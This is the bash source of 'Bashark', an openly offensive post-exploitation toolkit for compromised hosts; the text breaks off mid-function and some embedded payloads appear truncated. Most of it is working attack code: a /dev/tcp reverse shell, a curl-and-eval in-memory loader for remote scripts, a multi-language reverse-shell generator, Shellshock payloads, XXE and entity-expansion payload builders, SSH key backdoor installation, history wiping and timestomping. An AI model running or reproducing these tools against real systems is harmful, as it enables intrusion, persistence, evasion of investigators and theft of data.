#!/bin/bash version="2.0" red=`tput setaf 1` green=`tput setaf 2` yellow=`tput setaf 3` blue=`tput setaf 4` magenta=`tput setaf 5` grey=`tput setaf 8` reset=`tput sgr0` bold=`tput bold` underline=`tput smul` echo ' __________ .__ __ ________ _______ \______ \_____ _____| |__ _____ _______| | __ ___ __ \_____ \ \ _ \ | | _/\__ \ / ___/ | \\__ \\_ __ \ |/ / \ \/ / / ____/ / /_\ \ | | \ / __ \_\___ \| Y \/ __ \| | \/ < \ / / \ \ \_/ \ |______ /(____ /____ >___| (____ /__| |__|_ \ \_/ /\ \_______ \ /\ \_____ / \/ \/ \/ \/ \/ \/ \/ \/ \/ \/ ' printf "\n" echo "[*] Type 'help' to show available commands" printf "\n" files_to_delete=() dirs_to_delete=() cleanup="on" active_hosts=() print_good(){ echo "${green}[+]${reset}" $1 } print_error(){ echo "${red}[x]${reset}" $1 } print_info(){ echo "[*]" $1 } print_question(){ echo "[?]" $1 } command_error_exit(){ echo "${red}${bold}[LAST CMD ERROR:$?]${reset}" } root_check(){ if [[ $UID -ne 0 ]] then print_error 'You need to be root to run this command' echo exit 1 fi } PS1="${bold}bashark_$version${reset}$ " export PS1 if [ "$(uname)" == "Darwin" ]; then platform="osx" elif [ "$(uname)" == "Linux" ]; then platform="linux" fi #################COMMANDS################### usrs(){ if [[ "$@" =~ .*-h.* ]]; then echo " ${underline}USAGE:${reset} usrs [-h] ${underline}DESCRIPTION:${reset} Enumerate all local users and highlight currently logged-in" else current_user=`whoami` all_users=`cut -d: -f1 /etc/passwd` print_info "List of users:" echo "${all_users//$current_user/${green}${bold}*$current_user${reset}}" fi } getapp(){ if [[ "$@" =~ .*-h.* ]]; then echo " ${underline}USAGE:${reset} getapp [-h] [FILTER] ${underline}OPTIONAL ARGUMENTS:${reset} FILTER Show installed apps that match the filter (ex. getapp sql) ${underline}DESCRIPTION:${reset} Enumerate all installed applications" else IFS=: read -ra dirs_in_path <<< "$PATH" for dir in "${dirs_in_path[@]}"; do for file in "$dir"/*; do if [ $# -eq 0 ]; then [[ -x $file && -f $file ]] && print_good "${bold}${file##*/}${reset} is installed" else filter=$1 if [[ $file =~ $filter ]]; then [[ -x $file && -f $file ]] && print_good "${bold}${file##*/}${reset} is installed" fi fi done done fi } revshell(){ arguments_errors=0 if [[ "$@" =~ .*-h.* ]]; then echo " ${underline}USAGE:${reset} revshell [-h] HOST PORT ${underline}POSITIONAL ARGUMENTS:${reset} HOST Address of the listening host PORT Port to connect with ${underline}DESCRIPTION:${reset} Send a reverse shell to remote host" else if [[ "$1" =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]]; then host=$1 else print_error "Wrong IP address format" ((arguments_errors++)) fi if [ "$2" -eq "$2" ] 2>/dev/null; then port=$2 else print_error "Wrong port format: integer required" ((arguments_errors++)) fi if [ $arguments_errors = 0 ]; then print_good "Started reversed shell (${host}:${port})" revshell_cmd="bash -i >& /dev/tcp/${host}/${port} 0>&1" eval "$revshell_cmd" fi fi } quit(){ if [[ "$@" =~ .*-h.* ]]; then echo " ${underline}USAGE:${reset} quit [-h] ${underline}DESCRIPTION:${reset} Exit Bashark, clean history and execute cleanup routine" else print_info "Starting cleanup routine" fls=$(echo $files_to_delete | tr ":" "\n") drs=$(echo $dirs_to_delete | tr ":" "\n") print_info "Removing bash history" cat /dev/null > ~/.bash_history && history -c print_info "Started file cleanup routine" removed_files=0 removed_dirs=0 for file in ${fls[*]}; do rm $file ((removed_files++)) done for dir in ${drs[*]}; do rmdir $dir ((removed_dirs++)) done print_info "Removed ${bold}${removed_files}${reset} files" print_info "Removed ${bold}${removed_dirs}${reset} directories" fi } timestomp(){ if [[ "$@" =~ .*-h.* ]]; then echo " ${underline}USAGE:${reset} timestomp DATE FILE ${underline}POSITIONAL ARGUMENTS:${reset} DATE Set the date to spoof (ex. 20170322) FILE File to timestomp ${underline}DESCRIPTION:${reset} Change attributes of a file (access, modify, change)." else if [ $# -eq 0 ]; then print_error "Specify DATE and FILE" elif [ $# -eq 1 ]; then print_error "Specify FILE" else date=$1 file_to_modify=$2 filename=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 10 | head -n 1) touch -d $date $filename touch -r $filename $file_to_modify rm $filename print_good "Succesfully timestomped ${file_to_modify}" fi fi } portscan(){ opened_ports=0 if [[ "$@" =~ .*-h.* ]]; then echo " ${underline}USAGE:${reset} portscan [-h] HOST ${underline}POSITIONAL ARGUMENTS:${reset} HOST Host to scan ${underline}DESCRIPTION:${reset} Simple portscanner that shows if most popular ports are opened" else if [[ "$1" =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]]; then host=$1 if [[ `ping -c 2 ${host}` =~ .*Unreachable.* ]]; then print_error "Host (${host}) is unreachable" else ports=(5 7 18 20 21 22 23 25 29 37 42 43 49 53 69 70 79 80 103 108 109 110 115 118 119 137 139 143 150 156 161 179 190 194 197 389 396 443 444 445 458 546 547 563 569 1080) for port in ${ports[*]}; do (echo >/dev/tcp/$host/$port) &>/dev/null if [ $? -eq 0 ]; then print_good "$host:$port is ${green}opened${reset}" ((opened_ports++)) fi done fi if [ $opened_ports = 0 ]; then print_error "No ports opened" fi else print_error "Wrong IP address format" fi fi } i(){ if [[ "$@" =~ .*-h.* ]]; then echo " ${underline}USAGE:${reset} i [-h] ${underline}DESCRIPTION:${reset} Show information about compromised host" else star="${bold}${grey}<${reset}${magenta}${bold}*${reset}${bold}${grey}>${reset}" root_usrs=`grep 'x:0:' /etc/passwd` OS=`uname -s` REV=`uname -r` MACH=`uname -m` GetVersionFromFile() { VERSION=`cat $1 | tr "\n" ' ' | sed s/.*VERSION.*=\ // ` } if [ "${OS}" = "SunOS" ] ; then OS=Solaris ARCH=`uname -p` OSSTR="${OS} ${REV}(${ARCH} `uname -v`)" elif [ "${OS}" = "AIX" ] ; then OSSTR="${OS} `oslevel` (`oslevel -r`)" elif [ "${OS}" = "Linux" ] ; then KERNEL=`uname -r` if [ -f /etc/redhat-release ] ; then DIST='RedHat' PSUEDONAME=`cat /etc/redhat-release | sed s/.*\(// | sed s/\)//` REV=`cat /etc/redhat-release | sed s/.*release\ // | sed s/\ .*//` elif [ -f /etc/SuSE-release ] ; then DIST=`cat /etc/SuSE-release | tr "\n" ' '| sed s/VERSION.*//` REV=`cat /etc/SuSE-release | tr "\n" ' ' | sed s/.*=\ //` elif [ -f /etc/mandrake-release ] ; then DIST='Mandrake' PSUEDONAME=`cat /etc/mandrake-release | sed s/.*\(// | sed s/\)//` REV=`cat /etc/mandrake-release | sed s/.*release\ // | sed s/\ .*//` elif [ -f /etc/debian_version ] ; then DIST="Debian `cat /etc/debian_version`" REV="" fi if [ -f /etc/UnitedLinux-release ] ; then DIST="${DIST}[`cat /etc/UnitedLinux-release | tr "\n" ' ' | sed s/VERSION.*//`]" fi OSSTR="${OS} ${DIST} ${REV}(${PSUEDONAME} ${KERNEL} ${MACH})" fi os=${OSSTR} super_users=`grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'` if [[ "$root_usrs" =~ "$(whoami)" ]]; then is_root="(${green}Root privilleges${reset})" else is_root="(${red}No root privilleges${reset})" fi local_ip=`ip address | grep -Eo 'inet (addr:)?([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*' | grep -v '127.0.0.1'` global_ip=`wget http://ipecho.net/plain -O - -q ; echo` if [ `cat /proc/sys/kernel/randomize_va_space` = "2" ]; then aslr="${red}Enabled${reset} (data segment randomization)" elif [ `cat /proc/sys/kernel/randomize_va_space` = "1" ]; then aslr="${yellow}Enabled${reset}" else aslr="${green}Disabled${reset}" fi if [ `cat /proc/sys/kernel/dmesg_restrict` = "1" ]; then dmesg_restrict="${red}Enabled${reset} (data segment randomization)" elif [ `cat /proc/sys/kernel/dmesg_restrict` = "0" ]; then dmesg_restrict="${green}Disabled${reset}" fi if [ `cat /proc/sys/kernel/perf_event_paranoid` = "-1" ]; then perf_paranoid="${green}Disabled${reset}" elif [ `cat /proc/sys/kernel/perf_event_paranoid` = "0" ]; then perf_paranoid="${yellow}Enabled${reset} (restricted raw tracepoint access)" elif [ `cat /proc/sys/kernel/perf_event_paranoid` = "1" ]; then perf_paranoid="${red}Enabled${reset} (restricted CPU events access)" elif [ `cat /proc/sys/kernel/perf_event_paranoid` = "2" ]; then perf_paranoid="${red}Enabled${reset} (restricted kernel profiling)" fi host="127.0.0.1" opened_ports=() ports=(5 7 18 20 21 22 23 25 29 37 42 43 49 53 69 70 79 80 103 108 109 110 115 118 119 137 139 143 150 156 161 179 190 194 197 389 396 443 444 445 458 546 547 563 569 1080 5432 4444 5555) for port in ${ports[*]}; do (echo >/dev/tcp/$host/$port) &>/dev/null if [ $? -eq 0 ]; then opened_ports+=$port, fi done if [ ${#opened_ports} = 0 ]; then opened_ports="${red}None${reset}" fi echo " ${star}Username : ${bold}$(whoami)${reset} ${is_root} ${star}User Groups : $(groups $(whoami)) ${star}Super users : ${super_users} ${star}Hostname : $(hostname) ${star}OS : $os ${star}Kernel : $(uname -r) ${star}Arch : $(uname -m) ${star}Local IP : ${local_ip} ${star}Global IP : ${global_ip} ${star}RAM $(cat /proc/meminfo |grep MemTotal) $(cat /proc/meminfo |grep MemFree) $(cat /proc/meminfo |grep SwapTotal) ${star}Opened Ports : ${green}${opened_ports}${reset} ${star}Kernel configuration: * ASLR : ${aslr} * DMESG_RESTRICT: ${dmesg_restrict} * PERF_PARANOID : ${perf_paranoid} " fi } c(){ if [[ "$@" =~ .*-h.* ]]; then echo " ${underline}USAGE:${reset} c [-h] ${underline}DESCRIPTION:${reset} Clear screen" else clear fi } _(){ if [[ "$@" =~ .*-h.* ]]; then echo " ${underline}USAGE:${reset} _ [-h] ${underline}DESCRIPTION:${reset} Go back to previous directory (alias of 'cd ..')" else cd .. fi } getconf(){ not_found=0 if [[ "$@" =~ .*-h.* ]]; then echo " ${underline}USAGE:${reset} getconf [-h] [-v] ${underline}OPTIONAL ARGUMENTS:${reset} -v Show contents of config files (verbose mode) ${underline}DESCRIPTION:${reset} Enumerate and show configuration files" else confiles=("/etc/master.passwd" "/etc/group" "/etc/hosts" "/etc/crontab" "/etc/sysctl.conf" "/etc/ssh/ssh_config" "/etc/ssh/sshd_config" "/etc/resolv.conf" "/etc/syslog.conf" "/etc/chttp.conf" "/etc/lighttpd.conf" "/etc/cups/cupsd.confcda" "/etc/inetd.conf" "/opt/lampp/etc/httpd.conf" "/etc/samba/smb.conf" "/etc/openldap/ldap.conf" "/etc/ldap/ldap.conf" "/etc/exports" "/etc/auto.master" "/etc/auto_master" "/etc/fstab" "/etc/cpufreq-bench.conf" "/etc/dhcpcd.conf" "/etc/dnsmasq.conf" "/etc/fuse.conf" "/etc/gai.conf" "/etc/healthd.conf" "/etc/host.conf" "/etc/i3status.conf" "/etc/krb5.conf" "/etc/ld.so.conf" "/etc/libao.conf" "/etc/locale.conf" "/etc/logrotate.conf" "/etc/ltrace.conf" "/etc/makepkg.conf" "/etc/man_db.conf" "/etc/mdadm.conf" "/etc/mke2fs.conf" "/etc/mkinitcpio.conf" "/etc/modules.conf" "/etc/mpd.conf" "/etc/netconfig") for file in ${confiles[*]}; do if [ ! -f $file ]; then : else if [[ "$@" =~ .*-v.* ]]; then print_good "Found ${magenta}${file}${reset}:" cat $file printf "\n" else print_good "Found ${magenta}${file}${reset}" ((found++)) fi fi done if [[ $found = 0 ]]; then print_error "No configuration files found" fi fi } cleanup(){ if [[ "$@" =~ .*-h.* ]]; then echo " ${underline}USAGE:${reset} cleanup [-h] [on|off] ${underline}DESCRIPTION:${reset} When enabled, the cleanup routine deletes on exit every new file or folder created during Bashark session" else if [ $# -eq 0 ]; then if [[ $cleanup == "on" ]]; then print_info "Cleanup routine is ${green}${bold}ENABLED${reset}" else print_info "Cleanup routine is ${yellow}${bold}DISABLED${reset}" fi elif [ $1 == "on" ]; then cleanup="on" print_info "Cleanup routine is ${green}${bold}ENABLED${reset}" elif [ $1 == "off" ]; then cleanup="off" print_info "Cleanup routine is ${yellow}${bold}DISABLED${reset}" else print_error "No such option" fi fi } t(){ if [[ "$@" =~ .*-h.* ]]; then echo " ${underline}USAGE:${reset} t [-h] [TOUCH_COMMAND_ARGUMENTS] ${underline}DESCRIPTION:${reset} Alias of 'touch' command that respects current cleanup routine settings" else touch $1 $2 $3 $4 $5 $6 $7 $8 $9 if [[ "$cleanup" == "on" ]]; then files_to_delete+=`readlink -f $1`: fi print_info "Created ${bold}$1${reset} (${red}${bold}$(date '+%X')${reset})" fi } hosts(){ if [[ "$@" =~ .*-h.* ]]; then echo " ${underline}USAGE:${reset} hosts [-h] ${underline}DESCRIPTION:${reset} Enumerate active hosts in background" else for ip in $(seq 1 255); do ping -c 1 192.168.1.$ip>/dev/null; [ $? -eq 0 ] && printf "\n192.168.1.$ip is ${green}${bold}active${reset}\r" || : ; done & fi } isvm(){ if [[ "$@" =~ .*-h.* ]]; then echo " ${underline}USAGE:${reset} isvm [-h] ${underline}DESCRIPTION:${reset} Check if OS is running on virtual machine" else if ls -di --color=never /|grep -vqe "^2.*/$"; then print_info "Running in chroot" fi if grep -q "^flags.*hypervisor" /proc/cpuinfo; then print_info "Host is running on a Virtual Machine" else print_info "Host is not a Virtual Machine" fi fi } fnd(){ if [[ "$@" =~ .*-h.* ]]; then echo " ${underline}USAGE:${reset} fnd [-h] [-v] PATTERN ${underline}DESCRIPTION:${reset} Search for regex occurrence in current directory" else if [[ "$@" =~ .*-v.* ]]; then grep -rGnw '.' -e "${@: -1}" else grep -rGlw '.' -e "${@: -1}" fi fi } mkd(){ if [[ "$@" =~ .*-h.* ]]; then echo " ${underline}USAGE:${reset} mkd [-h] [ARGUMENTS] ${underline}DESCRIPTION:${reset} Alias of 'mkdir' command that respects current cleanup routine settings" else mkdir $1 $2 $3 $4 $5 $6 $7 $8 $9 if [[ "$cleanup" == "on" ]]; then dirs_to_delete+=`readlink -f $1`: fi print_info "Created ${bold}$1${reset} (${red}${bold}$(date '+%X')${reset})" fi } esc(){ if [[ "$@" =~ .*-h.* ]]; then echo " ${underline}USAGE:${reset} esc [-h] ${underline}DESCRIPTION:${reset} Spawn a non-restricted shell" else if hash awk 2>/dev/null; then awk 'BEGIN {system("/bin/sh")}' elif hash python 2>/dev/null; then python -c 'import pty; pty.spawn("/bin/sh")' elif hash ruby 2>/dev/null; then ruby -e 'exec "/bin/sh"' elif hash perl 2>/dev/null; then perl -e 'exec("sh -i");' else print_error "No interpreter found for shell escaping" fi fi } mex(){ if [[ "$@" =~ .*-h.* ]]; then echo " ${underline}USAGE:${reset} mx [-h] FILE ${underline}POSITIONAL ARGUMENTS:${reset} FILE File to add permissions ${underline}DESCRIPTION:${reset} Add executive permissions to a file" else if [ $# -eq 0 ]; then print_error "Specify the file" elif [ ! -f $1 ]; then print_error "File does not exist" else chmod a=x $1 print_good "$1 is executable" fi fi } lg(){ if [[ "$@" =~ .*-h.* ]]; then echo " ${underline}USAGE:${reset} lg [-h] REGEX ${underline}POSITIONAL ARGUMENTS:${reset} REGEX Regular expression to search in listed files ${underline}DESCRIPTION:${reset} This command searches for occurrence of specified regular expression in filenames of the current directory Alias of 'ls|grep -E '" else if [ $# -eq 0 ]; then print_error "Specify the regular expression" else ls|grep -E $1 fi fi } getperm(){ if [[ "$@" =~ .*-h.* ]]; then echo " ${underline}USAGE:${reset} getperm [-h] [-g] [-u] [-sb] [-c] [-wd] [-ed] [-wed] [-wf] [-nf] [DIRECTORY] ${underline}OPTIONAL ARGUMENTS:${reset} -g Search for SGID (chmod 2000) -u Search for SUID (chmod 4000) -sb Search for sticky bit -c Search for SGID and SUID in most common places (/bin, /sbin, /usr/bin, etc.) -wd Search for world-writeable directories -ed Search for world-executable directories -wed Search for both executable and writeable directories -wf Search for world-writeable files -nf Search for no-owner files [DIRECTORY] Directory to search instead of the current one ${underline}DESCRIPTION:${reset} Search for advanced linux file permissions in the current directory. You need to specify at least one optional argument." else if [ $# -eq 0 ]; then print_error "Specify at least one option" else dir="." if [[ "${@: -1}" =~ .*-.* ]]; then : else dir="${@: -1}" fi if [[ "$@" =~ .*-g.* ]]; then print_good "SGID files:" find ${dir} -perm -g=s -type f 2>/dev/null fi if [[ "$@" =~ .*-u.* ]]; then print_good "SUID files:" find ${dir} -perm -u=s -type f 2>/dev/null fi if [[ "$@" =~ .*-sb.* ]]; then print_good "Sticky bit files:" find ${dir} -perm -1000 -type d 2>/dev/null fi if [[ "$@" =~ .*-c.* ]]; then print_good "Results from common places:" for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done fi if [[ "$@" =~ .*-wd.* ]]; then print_good "World-writeable directories:" find ${dir} -perm -222 -type d 2>/dev/null fi if [[ "$@" =~ .*-ed.* ]]; then print_good "World-executable directories:" find ${dir} -perm -o x -type d 2>/dev/null fi if [[ "$@" =~ .*-wed.* ]]; then print_good "World-executable and writeable directories:" find ${dir} \( -perm -o w -perm -o x \) -type d 2>/dev/null fi if [[ "$@" =~ .*-wf.* ]]; then print_good "World-writeable files:" find ${dir} -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print fi if [[ "$@" =~ .*-nf.* ]]; then print_good "Files with no owner:" find ${dir} -xdev \( -nouser -o -nogroup \) -print fi fi fi } fileinfo(){ if [[ "$@" =~ .*-h.* ]]; then echo " ${underline}USAGE:${reset} fileinfo [-h] FILE ${underline}POSITIONAL ARGUMENTS:${reset} FILE File to inspect ${underline}DESCRIPTION:${reset} Get information about specified file" else if [ $# -eq 0 ]; then print_error "Specify the file to inspect" elif [ ! -f $1 ]; then print_error "No such file" else if [[ -x "$1" ]]; then executable="${green}yes${reset}" else executable="${red}no${reset}" fi echo " ${green}*${reset}NAME: $1 ${green}*${reset}CREATION DATE: $(stat -c %y $1| sed 's/^\([0-9\-]*\).*/\1/') ${green}*${reset}SIZE: $(stat --printf="%s" $1) bytes ${green}*${reset}EXECUTABLE: ${executable} ${green}*${reset}ENCODING: $(file -bi $1) " fi fi } fndre(){ #TODO FINISH if [[ "$@" =~ .*-h.* ]]; then echo " ${underline}USAGE:${reset} fndre [-h] FILE ${underline}POSITIONAL ARGUMENTS:${reset} FILE File to inspect ${underline}DESCRIPTION:${reset} Search for most popular regexes in a file (gmail and ip addresses, plaintext passwords, credit cards etc.)" else if [ $# -eq 0 ]; then print_error "Specify the file to inspect" elif [ ! -f $1 ]; then print_error "No such file" else filename=$1 declare -A regexes regexes[IP_addresses]="^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$" regexes[MAC_addresses]="(?:[0-9a-fA-F]:?){12}" regexes[Gmail_addresses]="\s.*@gmail.com" regexes[Plaintext_passwords]="[Pp]assword\s*[:=-].*\s" regexes[Usernames]="[Uu]ser\s*[:=-].*\s" regexes[Mastercard_regex]="[51-55]\d{14}" regexes[Visa_regex]="4\d{15}|4\d{12}" regexes[Discover_regex]="6011\d{12}|65\d{14}" regexes[AmericanExpress_regex]="34\d{13}|37\d{13}" regexes[DinersClub_regex]="[300-305]/d{11}|36/d{12}|38/d{12}" regexes[JCB_regex]="35\d{14}|2131\d{11}|1800\d{11})" for key in ${!regexes[@]}; do #echo $regexes[$key] print_good "$key search results:" re=$regexes[$key] grep -oE "$re" $filename done fi fi } bruteforce(){ if [[ "$@" =~ .*-h.* ]]; then echo " ${underline}USAGE:${reset} bruteforce [-h] DICTIONARY FILE ${underline}POSITIONAL ARGUMENTS:${reset} FILE File to bruteforce DICTIONARY Dictionary to use ${underline}DESCRIPTION:${reset} Bruteforce a file with a password" else if [ $# -eq 0 ]; then print_error "Specify the dictionary" fi if [ $# -eq 1 ]; then print_error "Specify the file to bruteforce" elif [ ! -f $1 ]; then print_error "No such dictionary" elif [ ! -f $2 ]; then print_error "No such file" else dictionary=$1 filename=$2 cracked=0 for word in $(cat $dictionary); do if [ ".zip" in $filename ]; then out=$(unzip -R $word $filename) if [ "inflating" in $out ]; then print_good "Found password: $green$bold$word$reset" (($cracked++)) break else : fi elif [ ".rar" in $filename ]; then out=$(rar x -p"$word" $filename 1>/dev/null 2>/dev/null) success=`echo $?` if [ "$success" = 0 ]; then print_good "Found password: $green$bold$word$reset" (($cracked++)) break else : fi fi done if [ $cracked = 0 ]; then print_error "Password not found. Try another dictionary" fi fi fi } cve(){ if [[ "$@" =~ .*-h.* ]]; then echo " ${underline}USAGE:${reset} cve [-h] ${underline}DESCRIPTION:${reset} Search for kernel exploits" else hits=0 declare -A exploits exploits=( ["2.4.20|2.2.24|2.4.25|2.4.26|2.4.27"]="CVE-2004-0077" ["2.4.29"]="CVE-2004-1235" ["2.6.34|2.6.35|2.6.36"]="caps_to_root (https://github.com/SecWiki/linux-kernel-exploits/blob/master/2004/caps_to_root/15916.c)" ["2.6.5|2.6.7|2.6.8|2.6.9|2.6.10|2.6.11"]="CVE-2005-0736" ["2.6.13|2.6.14|2.6.15|2.6.16|2.6.17"]="CVE-2006-2451" ["2.6.8|2.6.10|2.6.11|2.6.12|2.6.13|2.6.14|2.6.15|2.6.16"]="CVE-2006-3626" ["2.6.23|2.6.24"]="CVE-2008-0600" ["2.6.17|2.6.18|2.6.19|2.6.20|2.6.21|2.6.22|2.6.23|2.6.24|2.6.24.1"]="CVE-2008-0900" ["2.6.11|2.6.12|2.6.13|2.6.14|2.6.15|2.6.16|2.6.17|2.6.18|2.6.19|2.6.20|2.6.21|2.6.22"]="CVE-2008-4210" ["2.6.25|2.6.26|2.6.27|2.6.28|2.6.29"]="CVE-2009-1185" ["2.6.25|2.6.26|2.6.27|2.6.28|2.6.29"]="CVE-2009-1337" ["2.4.[4-37]|2.6.[0-30]"]="CVE-2009-2692" ["2.6.[1-19]"]="CVE-2009-2698" ["2.4.[4-37]|2.6.[15-31]"]="CVE-2009-3547" ) kernel=`uname -r` for exploit in "${!exploits[@]}"; do echo "${kernel}|grep -E ${exploit}" > tmp check=$? if [ "$check" -eq 0 ]; then echo "${red}${bold}<.>${reset} ${exploits[$exploit]}" ((hits++)) fi done if [ $hits = 0 ]; then print_error "No exploits found" else echo "${magenta}(${hits} hits )${reset}" fi rm tmp fi } memexec(){ if [[ "$@" =~ .*-h.* ]]; then echo " ${underline}USAGE:${reset} dexec [-h] HOST URL ${underline}POSITIONAL ARGUMENTS:${reset} HOST Remote server address URL Full path of the script on the remote server ${underline}DESCRIPTION:${reset} Download and execute a remote bash script in memory" else if [ $# -eq 0 ]; then print_error "Specify the server address" elif [ $# -eq 1 ]; then print_error "Specify the URL of the script" else host=$1 script=$2 X=`curl -fsSL "http://${host}/${script}"` eval "$X" print_good "Succesfully executed ${script} from memory" fi fi } jshell(){ arguments_errors=0 if [[ "$@" =~ .*-h.* ]]; then echo " ${underline}USAGE:${reset} jshell [-h] LHOST LPORT ${underline}POSITIONAL ARGUMENTS:${reset} LHOST Local address to listen on (set to "-" to automatically detect the ip) LPORT Local port to listen on ${underline}DESCRIPTION:${reset} Get a Javascript shell with XSS" else if [[ "$1" =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]]; then lhost=$1 elif [ "$1" = "-" ]; then lhost=`ip address | grep -Eo 'inet (addr:)?([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*' | grep -v '127.0.0.1'` else print_error "Wrong IP address format" ((arguments_errors++)) fi if [ "$2" -eq "$2" ] 2>/dev/null; then lport=$2 else print_error "Wrong port format: integer required" ((arguments_errors++)) fi if [ $arguments_errors = 0 ]; then if [ "$OSTYPE" = "darwin" ]; then netcat_cmd="nc -nlvk ${lport}" else netcat_cmd="nc -nlvp ${lport}" fi payload="" print_good "Generated JS payload:" echo ${payload} echo print_info "Waiting for the payload to be executed..." out=`$netcat_cmd` fi fi } shellcode(){ if [[ "$@" =~ .*-h.* ]]; then echo " ${underline}USAGE:${reset} shellcode [-h] SHELLCODE ${underline}POSITIONAL ARGUMENTS:${reset} SHELLCODE Shellcode to execute in '\x' escaped form ${underline}DESCRIPTION:${reset} Execute specified shellcode" else if [ $# -eq 0 ]; then print_error "Specify the shellcode to run" else shellcode=$1 cat >executor.c <dos.yml <dos.xml < ]> &lol9; EOL print_good "Saved payload as ${bold}dos.xml${reset}" else print_error "No such format" fi fi fi } xxe(){ if [[ "$@" =~ .*-h.* ]]; then echo " ${underline}USAGE:${reset} xxe [-h] [PAYLOAD] ${underline}OPTIONAL POSITIONAL ARGUMENTS:${reset} [PAYLOAD] Payload to execute inside the entity (default: file:///etc/passwd) ${underline}DESCRIPTION:${reset} Generate a XML External Entity Injection file" else if [ $# -eq 0 ]; then payload="file:///etc/passwd" else payload=$1 fi cat >file.xml < ]> &xxe; mypass EOL print_good "Generated ${bold}file.xml${reset} with ${bold}${payload}${reset} payload" fi } mod(){ if [[ "$@" =~ .*-h.* ]]; then echo " ${underline}USAGE:${reset} mod [-h] ACTION EXTENSION TEXT ${underline}POSITIONAL ARGUMENTS:${reset} ACTION Operation to perform with the text {append, prepend, replace, remove} EXTENSION File extension TEXT Text to append to files ${underline}DESCRIPTION:${reset} Modify contents of every file with specified extension in current directory" else if [ $# -eq 0 ]; then print_error "Specify the ACTION" elif [ $# -eq 1 ]; then print_error "Specify the EXTENSION" elif [ $# -eq 2 ]; then print_error "Specify the TEXT" else files=`ls` action=$1 extension=$2 text=$3 for file in ${files[*]}; do if [[ "$file" =~ .*${extension} ]]; then if [ $action = "append" ]; then cat $text >> $file elif [ $action = "prepend" ]; then printf '%s\n%s\n' $text "$(cat $file)" > $file elif [ $action = "replace" ]; then echo $text > $file elif [ $action = "remove" ]; then sed -i '/pattern/d' $file else print_error "No such action. Available choices: {append, prepend, replace}" fi fi done fi fi } getdbus(){ if [[ "$@" =~ .*-h.* ]]; then echo " ${underline}USAGE:${reset} getdbus [-h] ${underline}DESCRIPTION:${reset} List all available netbus services" else print_good "Dbus services for system:" dbus-send --system --dest=org.freedesktop.DBus --type=method_call --print-reply /org/freedesktop/DBus org.freedesktop.DBus.ListNames print_good "Dbus services for session:" dbus-send --session --dest=org.freedesktop.DBus --type=method_call --print-repl fi } getsec(){ if [[ "$@" =~ .*-h.* ]]; then echo " ${underline}USAGE:${reset} getsec [-h] ${underline}DESCRIPTION:${reset} List security services" else none=0 selinuxenabled >/dev/null 2>/dev/null if echo $? | grep -q 0; then print_error "SELinux is enabled." ((none++)) fi type aa-status >/dev/null 2>/dev/null if echo $? | grep -q 0; then print_error "AppArmor is probably installed." ((none++)) fi if cat /proc/self/status | grep -q PaX; then print_error "GrSec and PaX are present" ((none++)) fi if [ $none -eq 0 ]; then print_good "No security measures detected" fi fi } getidle(){ if [[ "$@" =~ .*-h.* ]]; then echo " ${underline}USAGE:${reset} getidle [-h] ${underline}DESCRIPTION:${reset} Get active PTYs ant their idle time" else ptys=`ls /dev/pts | grep '[[:digit:]]' | sort -g | tr '\n' ' '` echo $ptys | tr ' ' '\n' | while read i;do echo -ne "[*] PTY $i has been idle for " idler=`stat -t /dev/pts/$i | awk -F " " '{ print $12 }'` echo -ne "$((`date +%s` - $idler)) seconds.\n" done fi } keyinstall(){ if [[ "$@" =~ .*-h.* ]]; then echo " ${underline}USAGE:${reset} keyinstall [-h] KEY ${underline}POSITIONAL ARGUMENTS:${reset} KEY RSA key to add ${underline}DESCRIPTION:${reset} Add your RSA key to list of SSH authorized keys" else if [ $# -eq 0 ]; then print_error "Specify the KEY" else key=$1 touch /dev/shm/.q/.ssh touch -r / sshkey="ssh-rsa $key `whoami`@`hostname`" echo $sshkey >> ~/.ssh/authorized_keys print_good "Added $key to list of authorized keys" fi fi } revshellgen(){ function bash_shell(){ echo -e "bash -i >& /dev/tcp/$ipaddr/$port 0>&1" } function perl_shell(){ echo -e "perl -e 'use Socket; \$i=\"$ipaddr\" ;\$p=$port ;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'" } function python_shell(){ echo -e "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(( \"$ipaddr\",$port ));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" } function php_shell(){ echo -e "php -r '\$sock=fsockopen(\" $ipaddr\",$port );exec(\"/bin/sh -i <&3 >&3 2>&3\");'" } function ruby_shell(){ echo -e "ruby -rsocket -e'f=TCPSocket.open( \"$ipaddr\",$port ).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'" } function netcat1_shell(){ echo -e "nc -e /bin/sh $ipaddr $port \n" } function netcat2_shell(){ echo -e "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ipaddr $port >/tmp/f\n" } function netcat3_shell(){ echo -e "rm /tmp/l;mknod /tmp/l p;/bin/sh 0/tmp/l" } function java_shell(){ echo -e """ r = Runtime.getRuntime() p = r.exec([\"/bin/bash\",\"-c\",\"exec 5<>/dev/tcp/ $ipaddr / $port ;cat <&5 | while read line; do \$line 2>&5 >&5; done\"] as String[]) p.waitFor() """ } function shellshock_rce_shell(){ echo -e "wget -U \"() { test;};echo \"Content-type: text/plain\"; echo; echo; YOUR_COMMAND \" http:// TARGET_IP /cgi-bin/status\n" } function shellshock_bind_shell(){ echo "echo -e \"HEAD /cgi-bin/status HTTP/1.1\\r\\nUser-Agent: () { :;}; 